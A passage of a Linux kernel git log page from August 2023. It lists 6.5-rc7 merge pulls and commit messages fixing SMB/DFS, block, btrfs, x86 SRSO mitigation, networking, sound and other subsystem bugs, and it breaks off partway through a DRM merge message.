1. 20 Aug, 2023 7 commits
    • Paulo Alcantara's avatar
      smb: client: make smb2_compound_op() return resp buffer on success · c5f44a3d
      Paulo Alcantara authored
      If @out_iov and @out_buftype are passed, then return compounded
      responses regardless whether the request failed or not.  This will be
      useful for detecting reparse points on SMB2_CREATE responses as
      specified in MS-SMB2 2.2.14.
      
      No functional changes.
      Signed-off-by: default avatarPaulo Alcantara (SUSE) <pc@manguebit.com>
      Signed-off-by: default avatarSteve French <stfrench@microsoft.com>
      c5f44a3d
    • Paulo Alcantara's avatar
      smb: client: move some params to cifs_open_info_data · 8b4e285d
      Paulo Alcantara authored
      Instead of passing @adjust_tz and some reparse point related fields as
      parameters in ->query_path_info() and
      {smb311_posix,cifs}_info_to_fattr() calls, move them to
      cifs_open_info_data structure as they can be easily accessed through
      @data.
      
      No functional changes.
      Signed-off-by: default avatarPaulo Alcantara (SUSE) <pc@manguebit.com>
      Signed-off-by: default avatarSteve French <stfrench@microsoft.com>
      8b4e285d
    • Paulo Alcantara's avatar
      smb: client: ensure to try all targets when finding nested links · ce04127c
      Paulo Alcantara authored
      With current implementation, when a nested DFS link is found during
      mount(2), the client follows the referral and then try to connect to
      all of its targets.  If all targets failed, the client bails out
      rather than retrying remaining targets from previous referral.
      
      Fix this by stacking all referrals and targets so the client can retry
      remaining targets from previous referrals in case all targets of
      current referral have failed.
      
      Thanks to samba, this can be easily tested like below
      
      * Run the following under dfs folder in samba server
      
        $ ln -s "msdfs:srv\\bad-share" link1
        $ ln -s "msdfs:srv\\dfs\\link1,srv\\good-share" link0
      
      * Before patch
      
        $ mount.cifs //srv/dfs/link0 /mnt -o ...
        mount error(2): No such file or directory
        Refer to the mount.cifs(8) manual page (e.g. man mount.cifs)...
      
      * After patch
      
        $ mount.cifs //srv/dfs/link0 /mnt -o ...
        # ls /mnt
        bar  fileshare1  sub
      Signed-off-by: default avatarPaulo Alcantara (SUSE) <pc@manguebit.com>
      Signed-off-by: default avatarSteve French <stfrench@microsoft.com>
      ce04127c
    • Paulo Alcantara's avatar
      smb: client: introduce DFS_CACHE_TGT_LIST() · 3fea12f3
      Paulo Alcantara authored
      Add new helper which declares and initialises target list of a DFS
      referral rather having to do both separately.
      
      No functional changes.
      Signed-off-by: default avatarPaulo Alcantara (SUSE) <pc@manguebit.com>
      Signed-off-by: default avatarSteve French <stfrench@microsoft.com>
      3fea12f3
    • Linus Torvalds's avatar
      Linux 6.5-rc7 · 706a7415
      Linus Torvalds authored
      706a7415
    • Linus Torvalds's avatar
      Merge tag 'tty-6.5-rc7' of git://git.kernel.org/pub/scm/linux/kernel/git/gregkh/tty · b320441c
      Linus Torvalds authored
      Pull tty/serial fixes from Greg KH:
       "Here are some small tty and serial core fixes for 6.5-rc7 that resolve
        a lot of reported issues.
      
        Primarily in here are the fixes for the serial bus code from Tony that
        came in -rc1, as it hit wider testing with the huge number of
        different types of systems and serial ports. All of the reported
        issues with duplicate names and other issues with this code are now
        resolved.
      
        Other than that included in here is:
      
         - n_gsm fix for a previous fix
      
         - 8250 lockdep annotation fix
      
         - fsl_lpuart serial driver fix
      
         - TIOCSTI documentation update for previous CAP_SYS_ADMIN change
      
        All of these have been in linux-next for a while with no reported
        problems"
      
      * tag 'tty-6.5-rc7' of git://git.kernel.org/pub/scm/linux/kernel/git/gregkh/tty:
        serial: core: Fix serial core port id, including multiport devices
        serial: 8250: drop lockdep annotation from serial8250_clear_IER()
        tty: n_gsm: fix the UAF caused by race condition in gsm_cleanup_mux
        serial: core: Revert port_id use
        TIOCSTI: Document CAP_SYS_ADMIN behaviour in Kconfig
        serial: 8250: Fix oops for port->pm on uart_change_pm()
        serial: 8250: Reinit port_id when adding back serial8250_isa_devs
        serial: core: Fix kmemleak issue for serial core device remove
        MAINTAINERS: Merge TTY layer and serial drivers
        serial: core: Fix serial_base_match() after fixing controller port name
        serial: core: Fix serial core controller port name to show controller id
        serial: core: Fix serial core port id to not use port->line
        serial: core: Controller id cannot be negative
        tty: serial: fsl_lpuart: Clear the error flags by writing 1 for lpuart32 platforms
      b320441c
    • Linus Torvalds's avatar
      Merge tag 'rust-fixes-6.5-rc7' of https://github.com/Rust-for-Linux/linux · ec27a636
      Linus Torvalds authored
      Pull rust fix from Miguel Ojeda:
      
       - Macros: fix 'HAS_*' redefinition by the '#[vtable]' macro
         under conditional compilation
      
      * tag 'rust-fixes-6.5-rc7' of https://github.com/Rust-for-Linux/linux:
        rust: macros: vtable: fix `HAS_*` redefinition (`gen_const_name`)
      ec27a636
  2. 19 Aug, 2023 8 commits
    • Linus Torvalds's avatar
      Merge tag 'i2c-for-6.5-rc7' of git://git.kernel.org/pub/scm/linux/kernel/git/wsa/linux · 9e6c269d
      Linus Torvalds authored
      Pull i2c fixes from Wolfram Sang:
       "Usual set of driver fixes. A bit more than usual because I was
        unavailable for a while"
      
      * tag 'i2c-for-6.5-rc7' of git://git.kernel.org/pub/scm/linux/kernel/git/wsa/linux:
        i2c: bcm-iproc: Fix bcm_iproc_i2c_isr deadlock issue
        i2c: Update documentation to use .probe() again
        i2c: sun6i-p2wi: Fix an error message in probe()
        i2c: hisi: Only handle the interrupt of the driver's transfer
        i2c: tegra: Fix i2c-tegra DMA config option processing
        i2c: tegra: Fix failure during probe deferral cleanup
        i2c: designware: Handle invalid SMBus block data response length value
        i2c: designware: Correct length byte validation logic
        i2c: imx-lpi2c: return -EINVAL when i2c peripheral clk doesn't work
      9e6c269d
    • Linus Torvalds's avatar
      Merge tag 'for-6.5-rc6-tag' of git://git.kernel.org/pub/scm/linux/kernel/git/kdave/linux · 12e6cced
      Linus Torvalds authored
      Pull btrfs fixes from David Sterba:
      
       - fix infinite loop in readdir(), could happen in a big directory when
         files get renamed during enumeration
      
       - fix extent map handling of skipped pinned ranges
      
       - fix a corner case when handling ordered extent length
      
       - fix a potential crash when balance cancel races with pause
      
       - verify correct uuid when starting scrub or device replace
      
      * tag 'for-6.5-rc6-tag' of git://git.kernel.org/pub/scm/linux/kernel/git/kdave/linux:
        btrfs: fix incorrect splitting in btrfs_drop_extent_map_range
        btrfs: fix BUG_ON condition in btrfs_cancel_balance
        btrfs: only subtract from len_to_oe_boundary when it is tracking an extent
        btrfs: fix replace/scrub failure with metadata_uuid
        btrfs: fix infinite directory reads
      12e6cced
    • Linus Torvalds's avatar
      Merge tag 'fbdev-for-6.5-rc7' of git://git.kernel.org/pub/scm/linux/kernel/git/deller/linux-fbdev · b5cab28b
      Linus Torvalds authored
      Pull fbdev fixes and cleanups from Helge Deller:
      
       - various code cleanups in amifb, atmel_lcdfb, ssd1307fb, kyro and
         goldfishfb
      
      * tag 'fbdev-for-6.5-rc7' of git://git.kernel.org/pub/scm/linux/kernel/git/deller/linux-fbdev:
        fbdev: goldfishfb: Do not check 0 for platform_get_irq()
        fbdev: atmel_lcdfb: Remove redundant of_match_ptr()
        fbdev: kyro: Remove unused declarations
        fbdev: ssd1307fb: Print the PWM's label instead of its number
        fbdev: mmp: fix value check in mmphw_probe()
        fbdev: amifb: Replace zero-length arrays with DECLARE_FLEX_ARRAY() helper
      b5cab28b
    • Linus Torvalds's avatar
      Merge tag 'block-6.5-2023-08-19' of git://git.kernel.dk/linux · 2383ffc4
      Linus Torvalds authored
      Pull block fixes from Jens Axboe:
       "Main thing here is the fix for the regression in flush handling which
        caused IO hangs/stalls for a few reporters. Hopefully that should all
        be sorted out now. Outside of that, just a few minor fixes for issues
        that were introduced in this cycle"
      
      * tag 'block-6.5-2023-08-19' of git://git.kernel.dk/linux:
        blk-mq: release scheduler resource when request completes
        blk-crypto: dynamically allocate fallback profile
        blk-cgroup: hold queue_lock when removing blkg->q_node
        drivers/rnbd: restore sysfs interface to rnbd-client
      2383ffc4
    • Chengming Zhou's avatar
      blk-mq: release scheduler resource when request completes · e5c0ca13
      Chengming Zhou authored
      Chuck reported [1] an IO hang problem on NFS exports that reside on SATA
      devices and bisected to commit 615939a2 ("blk-mq: defer to the normal
      submission path for post-flush requests").
      
      We analysed the IO hang problem, found there are two postflush requests
      waiting for each other.
      
      The first postflush request completed the REQ_FSEQ_DATA sequence, so go to
      the REQ_FSEQ_POSTFLUSH sequence and added in the flush pending list, but
      failed to blk_kick_flush() because of the second postflush request which
      is inflight waiting in scheduler queue.
      
      The second postflush waiting in scheduler queue can't be dispatched because
      the first postflush hasn't released scheduler resource even though it has
      completed by itself.
      
      Fix it by releasing scheduler resource when the first postflush request
      completed, so the second postflush can be dispatched and completed, then
      make blk_kick_flush() succeed.
      
      While at it, remove the check for e->ops.finish_request, as all
      schedulers set that. Reaffirm this requirement by adding a WARN_ON_ONCE()
      at scheduler registration time, just like we do for insert_requests and
      dispatch_request.
      
      [1] https://lore.kernel.org/all/7A57C7AE-A51A-4254-888B-FE15CA21F9E9@oracle.com/
      
      Link: https://lore.kernel.org/linux-block/20230819031206.2744005-1-chengming.zhou@linux.dev/Reported-by: default avatarkernel test robot <oliver.sang@intel.com>
      Closes: https://lore.kernel.org/oe-lkp/202308172100.8ce4b853-oliver.sang@intel.com
      Fixes: 615939a2 ("blk-mq: defer to the normal submission path for post-flush requests")
      Reported-by: default avatarChuck Lever <chuck.lever@oracle.com>
      Signed-off-by: default avatarChengming Zhou <zhouchengming@bytedance.com>
      Tested-by: default avatarChuck Lever <chuck.lever@oracle.com>
      Link: https://lore.kernel.org/r/20230813152325.3017343-1-chengming.zhou@linux.dev
      [axboe: folded in incremental fix and added tags]
      Signed-off-by: default avatarJens Axboe <axboe@kernel.dk>
      e5c0ca13
    • Linus Torvalds's avatar
      Merge tag 'media/v6.5-3' of git://git.kernel.org/pub/scm/linux/kernel/git/mchehab/linux-media · aa9ea98c
      Linus Torvalds authored
      Pull media fixes from Mauro Carvalho Chehab:
       "Three driver fixes"
      
      * tag 'media/v6.5-3' of git://git.kernel.org/pub/scm/linux/kernel/git/mchehab/linux-media:
        media: imx: imx7-media-csi: Fix applying format constraints
        media: uvcvideo: Fix menu count handling for userspace XU mappings
        media: mtk-jpeg: Set platform driver data earlier
      aa9ea98c
    • Linus Torvalds's avatar
      Merge tag 'x86_urgent_for_v6.5_rc7' of git://git.kernel.org/pub/scm/linux/kernel/git/tip/tip · bf98bae3
      Linus Torvalds authored
      Pull x86 fixes from Borislav Petkov:
       "Extraordinary embargoed times call for extraordinary measures. That's
        why this week's x86/urgent branch is larger than usual, containing all
        the known fallout fixes after the SRSO mitigation got merged.
      
        I know, it is a bit late in the game but everyone who has reported a
        bug stemming from the SRSO pile, has tested that branch and has
        confirmed that it fixes their bug.
      
        Also, I've run it on every possible hardware I have and it is looking
        good. It is running on this very machine while I'm typing, for 2 days
        now without an issue. Famous last words...
      
         - Use LEA ...%rsp instead of ADD %rsp in the Zen1/2 SRSO return
           sequence as latter clobbers flags which interferes with fastop
           emulation in KVM, leading to guests freezing during boot
      
         - A fix for the DIV(0) quotient data leak on Zen1 to clear the
           divider buffers at the right time
      
         - Disable the SRSO mitigation on unaffected configurations as it got
           enabled there unnecessarily
      
         - Change .text section name to fix CONFIG_LTO_CLANG builds
      
         - Improve the optprobe indirect jmp check so that certain
           configurations can still be able to use optprobes at all
      
         - A serious and good scrubbing of the untraining routines by PeterZ:
            - Add proper speculation stopping traps so that objtool is happy
            - Adjust objtool to handle the new thunks
            - Make the thunk pointer assignable to the different untraining
              sequences at runtime, thus avoiding the alternative at the
              return thunk. It simplifies the code a bit too.
            - Add a entry_untrain_ret() main entry point which selects the
              respective untraining sequence
            - Rename things so that they're more clear
            - Fix stack validation with FRAME_POINTER=y builds
      
         - Fix static call patching to handle when a JMP to the return thunk
           is the last insn on the very last module memory page
      
         - Add more documentation about what each untraining routine does and
           why"
      
      * tag 'x86_urgent_for_v6.5_rc7' of git://git.kernel.org/pub/scm/linux/kernel/git/tip/tip:
        x86/srso: Correct the mitigation status when SMT is disabled
        x86/static_call: Fix __static_call_fixup()
        objtool/x86: Fixup frame-pointer vs rethunk
        x86/srso: Explain the untraining sequences a bit more
        x86/cpu/kvm: Provide UNTRAIN_RET_VM
        x86/cpu: Cleanup the untrain mess
        x86/cpu: Rename srso_(.*)_alias to srso_alias_\1
        x86/cpu: Rename original retbleed methods
        x86/cpu: Clean up SRSO return thunk mess
        x86/alternative: Make custom return thunk unconditional
        objtool/x86: Fix SRSO mess
        x86/cpu: Fix up srso_safe_ret() and __x86_return_thunk()
        x86/cpu: Fix __x86_return_thunk symbol type
        x86/retpoline,kprobes: Skip optprobe check for indirect jumps with retpolines and IBT
        x86/retpoline,kprobes: Fix position of thunk sections with CONFIG_LTO_CLANG
        x86/srso: Disable the mitigation on unaffected configurations
        x86/CPU/AMD: Fix the DIV(0) initial fix attempt
        x86/retpoline: Don't clobber RFLAGS during srso_safe_ret()
      bf98bae3
    • Linus Torvalds's avatar
      Merge tag 'powerpc-6.5-6' of git://git.kernel.org/pub/scm/linux/kernel/git/powerpc/linux · 4e7ffde6
      Linus Torvalds authored
      Pull powerpc fix from Michael Ellerman:
      
       - Fix hardened usercopy BUG when using /proc based firmware update
         interface
      
      Thanks to Nathan Lynch and Kees Cook.
      
      * tag 'powerpc-6.5-6' of git://git.kernel.org/pub/scm/linux/kernel/git/powerpc/linux:
        powerpc/rtas_flash: allow user copy to flash block cache objects
      4e7ffde6
  3. 18 Aug, 2023 16 commits
    • Sweet Tea Dorminy's avatar
      blk-crypto: dynamically allocate fallback profile · c984ff14
      Sweet Tea Dorminy authored
      blk_crypto_profile_init() calls lockdep_register_key(), which warns and
      does not register if the provided memory is a static object.
      blk-crypto-fallback currently has a static blk_crypto_profile and calls
      blk_crypto_profile_init() thereupon, resulting in the warning and
      failure to register.
      
      Fortunately it is simple enough to use a dynamically allocated profile
      and make lockdep function correctly.
      
      Fixes: 2fb48d88 ("blk-crypto: use dynamic lock class for blk_crypto_profile::lock")
      Cc: stable@vger.kernel.org
      Signed-off-by: default avatarSweet Tea Dorminy <sweettea-kernel@dorminy.me>
      Reviewed-by: default avatarEric Biggers <ebiggers@google.com>
      Link: https://lore.kernel.org/r/20230817141615.15387-1-sweettea-kernel@dorminy.meSigned-off-by: default avatarJens Axboe <axboe@kernel.dk>
      c984ff14
    • Ming Lei's avatar
      blk-cgroup: hold queue_lock when removing blkg->q_node · c164c7bc
      Ming Lei authored
      When blkg is removed from q->blkg_list from blkg_free_workfn(), queue_lock
      has to be held, otherwise, all kinds of bugs(list corruption, hard lockup,
      ..) can be triggered from blkg_destroy_all().
      
      Fixes: f1c006f1 ("blk-cgroup: synchronize pd_free_fn() from blkg_free_workfn() and blkcg_deactivate_policy()")
      Cc: Yu Kuai <yukuai3@huawei.com>
      Cc: xiaoli feng <xifeng@redhat.com>
      Cc: Chunyu Hu <chuhu@redhat.com>
      Cc: Mike Snitzer <snitzer@kernel.org>
      Cc: Tejun Heo <tj@kernel.org>
      Signed-off-by: default avatarMing Lei <ming.lei@redhat.com>
      Acked-by: default avatarTejun Heo <tj@kernel.org>
      Link: https://lore.kernel.org/r/20230817141751.1128970-1-ming.lei@redhat.comSigned-off-by: default avatarJens Axboe <axboe@kernel.dk>
      c164c7bc
    • Li Zhijian's avatar
      drivers/rnbd: restore sysfs interface to rnbd-client · 6548fce0
      Li Zhijian authored
      Commit 137380c0 renamed 'rnbd-client' to 'rnbd_client', this changed
      sysfs interface to /sys/devices/virtual/rnbd_client/ctl/map_device
      from /sys/devices/virtual/rnbd-client/ctl/map_device.
      
      CC: Ivan Orlov <ivan.orlov0322@gmail.com>
      CC: "Md. Haris Iqbal" <haris.iqbal@ionos.com>
      CC: Jack Wang <jinpu.wang@ionos.com>
      Fixes: 137380c0 ("block/rnbd: make all 'class' structures const")
      Signed-off-by: default avatarLi Zhijian <lizhijian@fujitsu.com>
      Acked-by: default avatarJack Wang <jinpu.wang@ionos.com>
      Link: https://lore.kernel.org/r/20230816022210.2501228-1-lizhijian@fujitsu.comSigned-off-by: default avatarJens Axboe <axboe@kernel.dk>
      6548fce0
    • Linus Torvalds's avatar
      Merge tag 'arm64-fixes' of git://git.kernel.org/pub/scm/linux/kernel/git/arm64/linux · d4ddefee
      Linus Torvalds authored
      Pull arm64 fixes from Catalin Marinas:
       "Two more SME fixes related to ptrace(): ensure that the SME is
        properly set up for the target thread and that the thread sees
        the ZT registers set via ptrace"
      
      * tag 'arm64-fixes' of git://git.kernel.org/pub/scm/linux/kernel/git/arm64/linux:
        arm64/ptrace: Ensure that the task sees ZT writes on first use
        arm64/ptrace: Ensure that SME is set up for target when writing SSVE state
      d4ddefee
    • Linus Torvalds's avatar
      Merge tag 'gpio-fixes-for-v6.5-rc7' of git://git.kernel.org/pub/scm/linux/kernel/git/brgl/linux · 3e13eee1
      Linus Torvalds authored
      Pull gpio fixes from Bartosz Golaszewski:
      
       - fix a regression in the sysfs interface
      
       - fix a reference counting bug that's been around for years
      
       - MAINTAINERS update
      
      * tag 'gpio-fixes-for-v6.5-rc7' of git://git.kernel.org/pub/scm/linux/kernel/git/brgl/linux:
        gpiolib: fix reference leaks when removing GPIO chips still in use
        gpiolib: sysfs: Do unexport GPIO when user asks for it
        MAINTAINERS: add content regex for gpio-regmap
      3e13eee1
    • Linus Torvalds's avatar
      Merge tag '6.5-rc6-smb3-client-fix' of git://git.samba.org/sfrench/cifs-2.6 · 8abd7287
      Linus Torvalds authored
      Pull smb client fix from Steve French:
       "A small SMB mount option fix, also for stable"
      
      * tag '6.5-rc6-smb3-client-fix' of git://git.samba.org/sfrench/cifs-2.6:
        smb: client: fix null auth
      8abd7287
    • Linus Torvalds's avatar
      Merge tag 'riscv-for-linus-6.5-rc7' of git://git.kernel.org/pub/scm/linux/kernel/git/riscv/linux · cd479d9c
      Linus Torvalds authored
      Pull RISC-V fixes from Palmer Dabbelt:
      
       - avoid excessive rejections from seccomp RET_ERRNO rules
      
       - compressed jal/jalr decoding fix
      
       - fixes for independent irq/softirq stacks on kernels built with
         CONFIG_FRAME_POINTER=n
      
       - avoid a hang handling uaccess fixups
      
       - another build fix for toolchain ISA strings, this time for Zicsr and
         Zifenci on old GNU toolchains
      
      * tag 'riscv-for-linus-6.5-rc7' of git://git.kernel.org/pub/scm/linux/kernel/git/riscv/linux:
        riscv: Handle zicsr/zifencei issue between gcc and binutils
        riscv: uaccess: Return the number of bytes effectively not copied
        riscv: stack: Fixup independent softirq stack for CONFIG_FRAME_POINTER=n
        riscv: stack: Fixup independent irq stack for CONFIG_FRAME_POINTER=n
        riscv: correct riscv_insn_is_c_jr() and riscv_insn_is_c_jalr()
        riscv: entry: set a0 = -ENOSYS only when syscall != -1
      cd479d9c
    • Linus Torvalds's avatar
      Merge tag 'sound-6.5-rc7' of git://git.kernel.org/pub/scm/linux/kernel/git/tiwai/sound · ce03e180
      Linus Torvalds authored
      Pull sound fixes from Takashi Iwai:
       "Slightly bigger than I wished, but here we go, a collection of fixes
        for 6.5.
      
        The only change in the core side is the ease for repeated ASoC error
        messages, and the rest are all pretty device-specific small fixes
        (including regression fixes) for ASoC Intel and HD-audio / USB-audio
        quirks"
      
      * tag 'sound-6.5-rc7' of git://git.kernel.org/pub/scm/linux/kernel/git/tiwai/sound:
        ALSA: hda/realtek - Remodified 3k pull low procedure
        ASoC: rt1308-sdw: fix random louder sound
        ALSA: hda/cs8409: Support new Dell Dolphin Variants
        ALSA: hda/realtek: Switch Dell Oasis models to use SPI
        ALSA: hda/realtek: Add quirks for HP G11 Laptops
        ASoC: meson: axg-tdm-formatter: fix channel slot allocation
        ASoC: SOF: ipc4-topology: Update the basecfg for copier earlier
        ASoC: SOF: intel: hda: Clean up link DMA for IPC3 during stop
        ASoC: Intel: sof-sdw-cs42142: fix for codec button mapping
        ASoC: Intel: sof-sdw: update jack detection quirk for LunarLake RVP
        ASoC: SOF: Fix incorrect use of sizeof in sof_ipc3_do_rx_work()
        ASoC: lower "no backend DAIs enabled for ... Port" log severity
        ASoC: rt5665: add missed regulator_bulk_disable
        ASoC: max98363: don't return on success reading revision ID
        ALSA: usb-audio: Add support for Mythware XA001AU capture and playback interfaces.
        ASoC: fsl: micfil: Use dual license micfil code
      ce03e180
    • Linus Torvalds's avatar
      Merge tag 'mmc-v6.5-rc1-2' of git://git.kernel.org/pub/scm/linux/kernel/git/ulfh/mmc · 88d4a164
      Linus Torvalds authored
      Pull MMC fixes from Ulf Hansson:
       "MMC core:
         - Fix in_flight[issue_type] value error to properly manage requests
      
        MMC host:
         - wbsd: Fix double free in the probe error path
         - sunplus: Fix error path in probe
         - sdhci_f_sdh30: Fix order of function calls in sdhci_f_sdh30_remove"
      
      * tag 'mmc-v6.5-rc1-2' of git://git.kernel.org/pub/scm/linux/kernel/git/ulfh/mmc:
        mmc: f-sdh30: fix order of function calls in sdhci_f_sdh30_remove
        mmc: sunplus: Fix error handling in spmmc_drv_probe()
        mmc: sunplus: fix return value check of mmc_add_host()
        mmc: wbsd: fix double mmc_free_host() in wbsd_init()
        mmc: block: Fix in_flight[issue_type] value error
      88d4a164
    • Linus Torvalds's avatar
      Merge tag 'pinctrl-v6.5-3' of git://git.kernel.org/pub/scm/linux/kernel/git/linusw/linux-pinctrl · f33fd7eb
      Linus Torvalds authored
      Pull pin control fixes from Linus Walleij:
       "Fixes two issues with the Qualcomm SA8775P platform:
      
         - Some minor device tree binding flunky that is nice to iron out but
           more importantly:
      
         - Support the increased interrupt targets mask from 3 to 4 bits,
           making interrupts with higher (hardware) numbers work"
      
      * tag 'pinctrl-v6.5-3' of git://git.kernel.org/pub/scm/linux/kernel/git/linusw/linux-pinctrl:
        pinctrl: qcom: Add intr_target_width field to support increased number of interrupt targets
        dt-bindings: pinctrl: qcom,sa8775p-tlmm: add gpio function constant
      f33fd7eb
    • Linus Torvalds's avatar
      Merge tag 'soc-fixes-6.5-3' of git://git.kernel.org/pub/scm/linux/kernel/git/soc/soc · 80706f55
      Linus Torvalds authored
      Pull ARM SoC fixes from Arnd Bergmann:
       "As usual, mostly DT fixes for the major Arm platforms from Qualcomm
        and NXP, plus a bit for Rockchips and others:
      
        The qualcomm fixes mainly deal with their higher-end arm64 devices
        trees, fixing issues in L3 interconnect, crypto, thermal, UFS and a
        regression for the DSI phy.
      
        NXP i.MX has two correctness fixes for the 64-bit chips, dealing with
        the imx93 "anatop" module and the CSI interface. On the 32-bit side,
        there are functional fixes for RTC, display and SD card intefaces.
      
        Rockchip fixes are for wifi support on certain boards, a eMMC
        stability and DT build warnings.
      
        On TI OMAP, a regulator is described in DT to avoid problems with the
        ethernet phy initialization.
      
        The code changes include a missing MMIO serialization on OMAP, plus a
        few minor fixes on ASpeed and AMD/Zynq chips"
      
      * tag 'soc-fixes-6.5-3' of git://git.kernel.org/pub/scm/linux/kernel/git/soc/soc: (30 commits)
        ARM: dts: am335x-bone-common: Add vcc-supply for on-board eeprom
        ARM: dts: am335x-bone-common: Add GPIO PHY reset on revision C3 board
        soc: aspeed: socinfo: Add kfree for kstrdup
        soc: aspeed: uart-routing: Use __sysfs_match_string
        ARM: dts: integrator: fix PCI bus dtc warnings
        arm64: dts: imx93: Fix anatop node size
        arm64: dts: qcom: sc7180: Fix DSI0_PHY reg-names
        ARM: dts: imx: Set default tuning step for imx6sx usdhc
        arm64: dts: imx8mm: Drop CSI1 PHY reference clock configuration
        arm64: dts: imx8mn: Drop CSI1 PHY reference clock configuration
        ARM: dts: imx: Set default tuning step for imx7d usdhc
        ARM: dts: imx6: phytec: fix RTC interrupt level
        ARM: dts: imx6sx: Remove LDB endpoint
        arm64: dts: rockchip: Fix Wifi/Bluetooth on ROCK Pi 4 boards
        ARM: zynq: Explicitly include correct DT includes
        arm64: dts: qcom: sa8775p-ride: Update L4C parameters
        arm64: dts: rockchip: minor whitespace cleanup around '='
        arm64: dts: rockchip: Disable HS400 for eMMC on ROCK 4C+
        arm64: dts: rockchip: Disable HS400 for eMMC on ROCK Pi 4
        arm64: dts: rockchip: add missing space before { on indiedroid nova
        ...
      80706f55
    • Linus Torvalds's avatar
      Merge tag 'asm-generic-fix-6.5' of git://git.kernel.org/pub/scm/linux/kernel/git/arnd/asm-generic · eabeef90
      Linus Torvalds authored
      Pull asm-generic regression fix from Arnd Bergmann:
       "Just one partial revert for a commit from the merge window that caused
        annoying behavior when building old kernels on arm64 hosts"
      
      * tag 'asm-generic-fix-6.5' of git://git.kernel.org/pub/scm/linux/kernel/git/arnd/asm-generic:
        asm-generic: partially revert "Unify uapi bitsperlong.h for arm64, riscv and loongarch"
      eabeef90
    • Josef Bacik's avatar
      btrfs: fix incorrect splitting in btrfs_drop_extent_map_range · c962098c
      Josef Bacik authored
      In production we were seeing a variety of WARN_ON()'s in the extent_map
      code, specifically in btrfs_drop_extent_map_range() when we have to call
      add_extent_mapping() for our second split.
      
      Consider the following extent map layout
      
      	PINNED
      	[0 16K)  [32K, 48K)
      
      and then we call btrfs_drop_extent_map_range for [0, 36K), with
      skip_pinned == true.  The initial loop will have
      
      	start = 0
      	end = 36K
      	len = 36K
      
      we will find the [0, 16k) extent, but since we are pinned we will skip
      it, which has this code
      
      	start = em_end;
      	if (end != (u64)-1)
      		len = start + len - em_end;
      
      em_end here is 16K, so now the values are
      
      	start = 16K
      	len = 16K + 36K - 16K = 36K
      
      len should instead be 20K.  This is a problem when we find the next
      extent at [32K, 48K), we need to split this extent to leave [36K, 48k),
      however the code for the split looks like this
      
      	split->start = start + len;
      	split->len = em_end - (start + len);
      
      In this case we have
      
      	em_end = 48K
      	split->start = 16K + 36K       // this should be 16K + 20K
      	split->len = 48K - (16K + 36K) // this overflows as 16K + 36K is 52K
      
      and now we have an invalid extent_map in the tree that potentially
      overlaps other entries in the extent map.  Even in the non-overlapping
      case we will have split->start set improperly, which will cause problems
      with any block related calculations.
      
      We don't actually need len in this loop, we can simply use end as our
      end point, and only adjust start up when we find a pinned extent we need
      to skip.
      
      Adjust the logic to do this, which keeps us from inserting an invalid
      extent map.
      
      We only skip_pinned in the relocation case, so this is relatively rare,
      except in the case where you are running relocation a lot, which can
      happen with auto relocation on.
      
      Fixes: 55ef6899 ("Btrfs: Fix btrfs_drop_extent_cache for skip pinned case")
      CC: stable@vger.kernel.org # 4.14+
      Reviewed-by: default avatarFilipe Manana <fdmanana@suse.com>
      Signed-off-by: default avatarJosef Bacik <josef@toxicpanda.com>
      Signed-off-by: default avatarDavid Sterba <dsterba@suse.com>
      c962098c
    • Borislav Petkov (AMD)'s avatar
      x86/srso: Correct the mitigation status when SMT is disabled · 6405b72e
      Borislav Petkov (AMD) authored
      Specify how is SRSO mitigated when SMT is disabled. Also, correct the
      SMT check for that.
      
      Fixes: e9fbc47b ("x86/srso: Disable the mitigation on unaffected configurations")
      Suggested-by: default avatarJosh Poimboeuf <jpoimboe@kernel.org>
      Signed-off-by: default avatarBorislav Petkov (AMD) <bp@alien8.de>
      Acked-by: default avatarJosh Poimboeuf <jpoimboe@kernel.org>
      Link: https://lore.kernel.org/r/20230814200813.p5czl47zssuej7nv@treble
      6405b72e
    • Linus Torvalds's avatar
      Merge tag 'net-6.5-rc7' of git://git.kernel.org/pub/scm/linux/kernel/git/netdev/net · 0e8860d2
      Linus Torvalds authored
      Pull networking fixes from Jakub Kicinski:
       "Including fixes from ipsec and netfilter.
      
        No known outstanding regressions.
      
        Fixes to fixes:
      
         - virtio-net: set queues after driver_ok, avoid a potential race
           added by recent fix
      
         - Revert "vlan: Fix VLAN 0 memory leak", it may lead to a warning
           when VLAN 0 is registered explicitly
      
         - nf_tables:
            - fix false-positive lockdep splat in recent fixes
            - don't fail inserts if duplicate has expired (fix test failures)
            - fix races between garbage collection and netns dismantle
      
        Current release - new code bugs:
      
         - mlx5: Fix mlx5_cmd_update_root_ft() error flow
      
        Previous releases - regressions:
      
         - phy: fix IRQ-based wake-on-lan over hibernate / power off
      
        Previous releases - always broken:
      
         - sock: fix misuse of sk_under_memory_pressure() preventing system
           from exiting global TCP memory pressure if a single cgroup is under
           pressure
      
         - fix the RTO timer retransmitting skb every 1ms if linear option is
           enabled
      
         - af_key: fix sadb_x_filter validation, amment netlink policy
      
         - ipsec: fix slab-use-after-free in decode_session6()
      
         - macb: in ZynqMP resume always configure PS GTR for non-wakeup
           source
      
        Misc:
      
         - netfilter: set default timeout to 3 secs for sctp shutdown send and
           recv state (from 300ms), align with protocol timers"
      
      * tag 'net-6.5-rc7' of git://git.kernel.org/pub/scm/linux/kernel/git/netdev/net: (49 commits)
        ice: Block switchdev mode when ADQ is active and vice versa
        qede: fix firmware halt over suspend and resume
        net: do not allow gso_size to be set to GSO_BY_FRAGS
        sock: Fix misuse of sk_under_memory_pressure()
        sfc: don't fail probe if MAE/TC setup fails
        sfc: don't unregister flow_indr if it was never registered
        net: dsa: mv88e6xxx: Wait for EEPROM done before HW reset
        net/mlx5: Fix mlx5_cmd_update_root_ft() error flow
        net/mlx5e: XDP, Fix fifo overrun on XDP_REDIRECT
        i40e: fix misleading debug logs
        iavf: fix FDIR rule fields masks validation
        ipv6: fix indentation of a config attribute
        mailmap: add entries for Simon Horman
        broadcom: b44: Use b44_writephy() return value
        net: openvswitch: reject negative ifindex
        team: Fix incorrect deletion of ETH_P_8021AD protocol vid from slaves
        net: phy: broadcom: stub c45 read/write for 54810
        netfilter: nft_dynset: disallow object maps
        netfilter: nf_tables: GC transaction race with netns dismantle
        netfilter: nf_tables: fix GC transaction races with netns and netlink event exit path
        ...
      0e8860d2
    • Linus Torvalds's avatar
      Merge tag 'drm-fixes-2023-08-18-1' of git://anongit.freedesktop.org/drm/drm · 1ada9c07
      Linus Torvalds authored
      Pull drm fixes from Dave Airlie:
       "Regular enough week, mostly the usual amdgpu and i915 fixes.  Also
        qaic, nouveau, qxl and a revert for an EDID patch that had some side
        effects, along with a couple of panel fixes.
      
        edid:
         - revert mode parsing fix that had side effects.
      
        i915:
